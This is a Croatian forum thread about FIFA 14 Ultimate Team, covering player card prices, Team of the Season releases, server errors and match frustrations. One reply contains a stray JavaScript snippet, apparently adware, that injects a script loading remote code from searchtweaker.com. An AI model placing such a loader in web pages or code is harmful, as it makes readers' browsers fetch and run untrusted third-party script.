FIFA 14

poruka: 12.463
|
čitano: 1.696.152
|
moderatori: DrNasty, pirat
+/- sve poruke
ravni prikaz
starije poruke gore
15 godina
Re: FIFA 14
Vladitor kaže...

englezi su smeće na futu

{#} 

Edit: Evo nakon par tekmi sa kompany-em i toure-om mogu rec da je kompany zvijer.. znaci malo je brzi od NIF-a al 10x jaci i dosta dobar u skoku.. Ali i dalje previsoka cijena za jednog CB-a.. Sto se tice Toure-a razocaro me totalno.. pace slican ko nif.. glava prosjecna.. udarac isto kako kad sve u svemu nikakav igrac za 1.3mil

01010101 00100000 01001101 01100001 01100100 00111111
Poruka je uređivana zadnji put pet 2.5.2014 22:33 (Encyanix).
16 godina
movie kaže...
izvone kaže...

Kaj je sad ovo za legende? PC? Vidim reklamu na webappu kao "challenge my legends" i slika s baleom kao osoba ne kao igraća kartica

Osim na fotke baci pogled i na tekst koji ide uz njih i nećeš imati upitnika...

http://www.easports.com/fifa/news-updates-gameplay/article/fifa-14-gareth-bale-fut-legends

Kad sam ja vidio sliku nije bilo linka na tu stranicu,valjda sam vidio u samome početku,ispričavam se

14 godina
neaktivan
FIFA 14

Je li uzimao neko coinse sa ove stranice ?

http://www.fifaservice.com/

0 0 hvala 0
13 godina
FIFA 14

veci ti je problem ako ban popuhas od EA, nije bitna kkoja je stranica...

https://www.youtube.com/user/crazypeopleteamcro
Moj PC  
0 0 hvala 0
12 godina
neaktivan
FIFA 14

napokon nakon bog zna koliko paketića kupovanja di sam najbolje dobija wiliama sad dobijem terrya TOTS i ozila taman za usrane engleza valjda će proradit.

Moj PC  
0 0 hvala 0
13 godina
neaktivan
FIFA 14

Igramo klubove i fino lijepo vodimo 3-0 unatoč tome što je naš dobio crveni i sve super. Kad ono dođe 89' minuta i nije nam bilo nikakve pomoći. Pri rezultatu od 3-1 u 89' oni dobe slobodan udarac sa 25m i zabiju unatoč tome što je udarac bio odvratno slab i skoro po sredini. I nakon toga su uslijedila još dva gola u 90' pri kojima nismo mogli apsolutno ništa. Lopta je doslovno prošla golmanu kroz rukavicu (slika). Imali smo sreće pa zabili iz kornera još jedan u 90' za x. Ali svašta. 

2 0 hvala 0
17 godina
antiljano27 kaže...

Igramo klubove i fino lijepo vodimo 3-0 unatoč tome što je naš dobio crveni i sve super. Kad ono dođe 89' minuta i nije nam bilo nikakve pomoći. Pri rezultatu od 3-1 u 89' oni dobe slobodan udarac sa 25m i zabiju unatoč tome što je udarac bio odvratno slab i skoro po sredini. I nakon toga su uslijedila još dva gola u 90' pri kojima nismo mogli apsolutno ništa. Lopta je doslovno prošla golmanu kroz rukavicu (slika). Imali smo sreće pa zabili iz kornera još jedan u 90' za x. Ali svašta. 

Zbog ovakvih stvari čovjek dobije želju zabiti gamepad u monitor ali opet, samo šteta...i dalje ne razumijem zašto neki put igra mora jednoj ekipi dati poguranac? Tko je bolji, bolji je i gotovo...na to se nitko ne bi trebao ljutiti ili žaliti, ovako...

14 godina
neaktivan
FIFA 14

Ima netko da puši Marlboro, a ima viška FUT14 coinsa? {#}

0 0 hvala 0
14 godina
neaktivan
intelpro kaže...

Ima li trenutno aktivni neki FIFA 14 online turnir, ili liga da organizira neko iz HR ili sa balkana ?

http://www.fifa-expert.com

Klikni na Forum, regaj se i imaš svakodnevno turnire u FUT14 na PC i PS3, lige turniri i slično.

16 godina
FIFA 14

Kada je i koji sljedeći TOTS?

Poruka je uređivana zadnji put sub 3.5.2014 14:02 (izvone).
Moj PC  
0 0 hvala 0
14 godina
FIFA 14

Srijeda, Bundesliga

http://25.media.tumblr.com/tumblr_makcziBKrN1ryi1myo1_500.gif
Moj PC  
0 0 hvala 0
16 godina
KiCo77 kaže...

Srijeda, Bundesliga

To se čeka :) sve pare na TOTS mandžu :D

Poruka je uređivana zadnji put sub 3.5.2014 15:18 (izvone).
17 godina
izvone kaže...

Nema tots mandže.... zaribao prva dva gola protiv reala i maknuli ga..

13 godina
FIFA 14

Ekipa, odakle vam toliko love za C. Ronalda u Fifa Ultimate Teamu?

Moj PC  
0 0 hvala 0
16 godina
neaktivan
movie kaže...
izvone kaže...

Daj prestani više lagat ovaj napaćeni narod!!!

16 godina
movie kaže...
izvone kaže...

Ja vidio da ima,a i kakva je smisao,zabija cijelu sezonu sezonu  u BL i sad jedu sje. i nema ga,oni i tako CL ne prate kolko ja znam samo MOTM

14 godina
neaktivan
izvone kaže...
movie kaže...
izvone kaže...

Ja vidio da ima,a i kakva je smisao,zabija cijelu sezonu sezonu  u BL i sad jedu sje. i nema ga,oni i tako CL ne prate kolko ja znam samo MOTM

TOTS je Bundesligaški i gleda se samo učinak igrača u Bundesligi. Tako da će mandžo vjerojatno dobiti TOTS zajedno s Lewandowskim. Mislim da će mu cijena biti oko 300k, eventulno 250k u utorak pred kraj TOTSa.

17 godina
DangerouS kaže...
izvone kaže...

TOTS je Bundesligaški i gleda se samo učinak igrača u Bundesligi. Tako da će mandžo vjerojatno dobiti TOTS zajedno s Lewandowskim. Mislim da će mu cijena biti oko 300k, eventulno 250k u utorak pred kraj TOTSa.

Kaj se vi palite na guranje i ne kužite zahebanciju? Kako cijene stoje ove godine mandžina cijena će i prije utorka biti jako povoljna...

Poruka je uređivana zadnji put sub 3.5.2014 16:26 (movie).
17 godina
Praetorian1 kaže...

Kaj si na vikendu?

14 godina
neaktivan
movie kaže...
DangerouS kaže...
izvone kaže...

Kaj se vi palite na guranje i ne kužite zahebanciju? Kako cijene stoje ove godine mandžina cijena će i prije utorka biti jako povoljna...

Moze biti da ce cijena biti povoljna, ali je Mandžo ove godine overpowered pa bi mogao radi hypea dosta skočiti, tj biti tako oko 250k-300k kao prošle godine.

16 godina
neaktivan
movie kaže...
Praetorian1 kaže...

Kaj si na vikendu?

nemam vikenda, radim 2-2-2 pa 2 dana slobodno. To jest imam vikend ak mi se potrefi...

13 godina
Aj netko beki wager na PC.u... Dosadno vise ovo :)
https://www.youtube.com/user/crazypeopleteamcro
14 godina
neaktivan
FIFA 14

Super su serveri danas, pokusavm igrat ovaj BPL kup (protiv kompa) i vec 5 puta dosad mi se dogodilo da pobjedim tekmu i onda dobijem poruku "sorry, imamo grešku u komunikaciji sa serverom" i izbaci me iz UT i naravno ne registrira pobjedu... {#}

Moj PC  
0 0 hvala 0
17 godina
Praetorian1 kaže...

nemam vikenda, radim 2-2-2 pa 2 dana slobodno. To jest imam vikend ak mi se potrefi...

Jel si bar član sindikata?

edit: tko je danas ujutro trgovao na marketu dobro je prošao. Upravo sam prodao zadnjeg igrača kojeg sam danas kupio i na kraju balade imam coinsa koliko sam imao i ujutro ali imam u klubu tots ramseya, terrya i 5 hunter kartica.. da nisma morao ići ujutro od doma mogao sam još to podebljati.. no i ovako je više nego dobro..

Poruka je uređivana zadnji put sub 3.5.2014 18:31 (movie).
11 godina
neaktivan
FIFA 14

IF Sterling, ima li iko iskustva gdje najbolji na LM-u, CAM-u ili ST-u ?

0 0 hvala 0
17 godina
miikaa77 kaže...

IF Sterling LW - kako ćeš ga dopeljati do CAM-a ili ST-ea?

Poruka je uređivana zadnji put ned 4.5.2014 3:49 (movie).
13 godina
neaktivan
movie kaže...
miikaa77 kaže...

IF Sterling LW - kako ćeš ga dopeljati do CAM-a ili ST-ea?

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Misli na zadnji if i onaj gdje je bio bocno

Origin ID:Draksides,Steam ID:drakul101,Xfire-Darksides
17 godina
FIFA 14

Gotovo je, nisam dočekao nijemce jer sam noćas potrošio zadnje coinse i priču završio s englezima. Više mi se nije dalo niti trgovati.. do kraja pomalo igram i to je to...

Moj PC  
0 0 hvala 0
14 godina
neaktivan
movie kaže...

Gotovo je, nisam dočekao nijemce jer sam noćas potrošio zadnje coinse i priču završio s englezima. Više mi se nije dalo niti trgovati.. do kraja pomalo igram i to je to...

Držat će te tjedan dana, možda i manje, a onda ćeš rasprodati cijeli tim i opet slagati novi. Svaki igrač takvu stvar prođe u FUTu barem 5 puta godišnje.

17 godina
DangerouS kaže...

Držat će te tjedan dana, možda i manje, a onda ćeš rasprodati cijeli tim i opet slagati novi. Svaki igrač takvu stvar prođe u FUTu barem 5 puta godišnje.

Ja sam ovu godinu promijenio dvadesetak ekipa i isprobao sve igrače tako da mislim da je ovo zadnje kaj imam u ovoj sezoni ove fife..nemam više što isprobavati... ostat će žal za tots nijemcima ali eto..

E-mail:
Lozinka:

vrh stranice